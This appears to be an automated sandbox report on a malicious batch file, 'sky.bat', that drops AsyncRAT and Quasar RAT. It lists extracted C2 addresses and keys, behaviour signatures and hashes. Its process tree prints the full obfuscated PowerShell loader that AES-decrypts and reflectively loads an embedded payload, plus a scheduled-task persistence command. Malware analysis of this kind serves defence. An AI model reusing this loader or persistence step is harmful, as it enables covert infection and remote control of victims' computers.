Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-1703_x64
  • resource
    win10-20220901-en
  • resource tags

    arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
  • submitted
    12/01/2023, 16:32

General

  • Target

    sky.bat

  • Size

    49KB

  • MD5

    4300caa42bd8fc0c7d9ce83b19c6f1f6

  • SHA1

    ed8eedc542e02a8ab749b02f161d39bb840a589c

  • SHA256

    d329a265d4005b2cb8902d6148ff5e4477f2203bc2e476e51e5895f9be99c53e

  • SHA512

    0ebcd250ff95b3bd8058e4bc69640afec65cf91a2745e71303edc48e6066ffa44a589bc2bd060eb54a0c9bc189169757f9a0ec292a6200090e1422db5f64ed30

  • SSDEEP

    1536:WBqEwgF4HVzac6F8F2xqWa8VfXx0da57eezlV4R:1/gF41GLNxfa8VPuda57egQ

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

154.12.250.38:6606

154.12.250.38:7707

154.12.250.38:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

C2

154.12.250.38:4782

Mutex

41264372-ec70-4ccc-bf22-851572e94d2a

Attributes
  • encryption_key

    2D1A3994D3C8E5C6071E7048589030F3E389DDC7

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Async RAT payload 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sky.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1928
    • C:\Users\Admin\AppData\Local\Temp\sky.bat.exe
      "sky.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $eIfqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sky.bat').Split([Environment]::NewLine);foreach ($YiLGW in $eIfqq) { if ($YiLGW.StartsWith(':: ')) { $VuGcO = $YiLGW.Substring(3); break; }; };$uZOcm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VuGcO);$BacUA = New-Object System.Security.Cryptography.AesManaged;$BacUA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BacUA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BacUA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CeRsc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=');$BacUA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2hn/J717js1MwdbbqMn7Lw==');$Nlgap = $BacUA.CreateDecryptor();$uZOcm = $Nlgap.TransformFinalBlock($uZOcm, 0, $uZOcm.Length);$Nlgap.Dispose();$BacUA.Dispose();$mNKMr = New-Object System.IO.MemoryStream(, $uZOcm);$bTMLk = New-Object System.IO.MemoryStream;$NVPbn = New-Object System.IO.Compression.GZipStream($mNKMr, [IO.Compression.CompressionMode]::Decompress);$NVPbn.CopyTo($bTMLk);$NVPbn.Dispose();$mNKMr.Dispose();$bTMLk.Dispose();$uZOcm = $bTMLk.ToArray();$gDBNO = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($uZOcm);$PtfdQ = $gDBNO.EntryPoint;$PtfdQ.Invoke($null, (, [string[]] ('')))
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4604
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mbwito.bat"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:800
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mbwito.bat"'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4904
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mbwito.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3164
            • C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe
              "mbwito.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $aObMV = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\mbwito.bat').Split([Environment]::NewLine);foreach ($HMeAa in $aObMV) { if ($HMeAa.StartsWith(':: ')) { $jAtOW = $HMeAa.Substring(3); break; }; };$ZFFIb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jAtOW);$ufQIZ = New-Object System.Security.Cryptography.AesManaged;$ufQIZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ufQIZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ufQIZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xOjIEV/9x6H2AllyLs+AVd39m7l0oQelRu64WlIJr2c=');$ufQIZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TIb2elsPL654mr15kjK1tw==');$iHrgg = $ufQIZ.CreateDecryptor();$ZFFIb = $iHrgg.TransformFinalBlock($ZFFIb, 0, $ZFFIb.Length);$iHrgg.Dispose();$ufQIZ.Dispose();$rCpxm = New-Object System.IO.MemoryStream(, $ZFFIb);$ZoKsk = New-Object System.IO.MemoryStream;$EUWbj = New-Object System.IO.Compression.GZipStream($rCpxm, [IO.Compression.CompressionMode]::Decompress);$EUWbj.CopyTo($ZoKsk);$EUWbj.Dispose();$rCpxm.Dispose();$ZoKsk.Dispose();$ZFFIb = $ZoKsk.ToArray();$ARNYR = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ZFFIb);$BjviT = $ARNYR.EntryPoint;$BjviT.Invoke($null, (, [string[]] ('')))
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3964
              • C:\Windows\SYSTEM32\schtasks.exe
                "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe" /rl HIGHEST /f
                7⤵
                • Creates scheduled task(s)
                PID:4740

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    6128469adf6a46e1fde5c24182bcbece

    SHA1

    b1056fc0c08aa1c70dd2c4b4aaeb6ddd7661d981

    SHA256

    d8f5a2e911a00db37c73ad0251651a5a72cdc5455f5ae8ca2ea275d3351fc61c

    SHA512

    efec3e82e4c59657c2540c6c77ca5e4170fbea30d239df7d15b8f0459aba0b3ce5df3cc25ae321585f5f32e4ecc0a2f2fccbc831521598e892c5bb37ae0e8500

  • C:\Users\Admin\AppData\Local\Temp\mbwito.bat

    Filesize

    325KB

    MD5

    2f84982ec56d82645ac61de4fb3e6e50

    SHA1

    92817fc3db66755ad189049f8e4ad3dbbaaa6db1

    SHA256

    56aa2d6eee7f10040da74bb29c3bbe1e555547249ac4fc21e53e7d6182941e9c

    SHA512

    2a9802c6eb9eb263b7388e6659cd424592bc151e392330ac9fb3ebf96dc1e4127db124bd412c85480247089e9db972966c735b9e049680d6200b97581135c3cd

  • C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe

    Filesize

    435KB

    MD5

    f7722b62b4014e0c50adfa9d60cafa1c

    SHA1

    f31c17e0453f27be85730e316840f11522ddec3e

    SHA256

    ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

    SHA512

    7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

  • C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe

    Filesize

    435KB

    MD5

    f7722b62b4014e0c50adfa9d60cafa1c

    SHA1

    f31c17e0453f27be85730e316840f11522ddec3e

    SHA256

    ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

    SHA512

    7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

  • C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

    Filesize

    435KB

    MD5

    f7722b62b4014e0c50adfa9d60cafa1c

    SHA1

    f31c17e0453f27be85730e316840f11522ddec3e

    SHA256

    ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

    SHA512

    7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

  • C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

    Filesize

    435KB

    MD5

    f7722b62b4014e0c50adfa9d60cafa1c

    SHA1

    f31c17e0453f27be85730e316840f11522ddec3e

    SHA256

    ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

    SHA512

    7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

  • memory/3964-220-0x000001A4726F0000-0x000001A472778000-memory.dmp

    Filesize

    544KB

  • memory/3964-227-0x000001A473090000-0x000001A4730E0000-memory.dmp

    Filesize

    320KB

  • memory/3964-218-0x000001A472410000-0x000001A472452000-memory.dmp

    Filesize

    264KB

  • memory/3964-228-0x000001A4731A0000-0x000001A473252000-memory.dmp

    Filesize

    712KB

  • memory/3964-229-0x000001A473430000-0x000001A4735F2000-memory.dmp

    Filesize

    1.8MB

  • memory/4604-141-0x00000112AD050000-0x00000112AD062000-memory.dmp

    Filesize

    72KB

  • memory/4604-171-0x00000112AE440000-0x00000112AE462000-memory.dmp

    Filesize

    136KB

  • memory/4604-168-0x00000112AE3B0000-0x00000112AE440000-memory.dmp

    Filesize

    576KB

  • memory/4604-161-0x00000112ADC20000-0x00000112ADC80000-memory.dmp

    Filesize

    384KB

  • memory/4604-154-0x00000112ADAC0000-0x00000112ADACA000-memory.dmp

    Filesize

    40KB

  • memory/4604-145-0x00000112ADAE0000-0x00000112ADAFE000-memory.dmp

    Filesize

    120KB

  • memory/4604-144-0x00000112ADBA0000-0x00000112ADC1E000-memory.dmp

    Filesize

    504KB

  • memory/4604-139-0x00000112AD040000-0x00000112AD04E000-memory.dmp

    Filesize

    56KB

  • memory/4604-132-0x00000112ADB20000-0x00000112ADB96000-memory.dmp

    Filesize

    472KB

  • memory/4604-127-0x00000112AD970000-0x00000112AD992000-memory.dmp

    Filesize

    136KB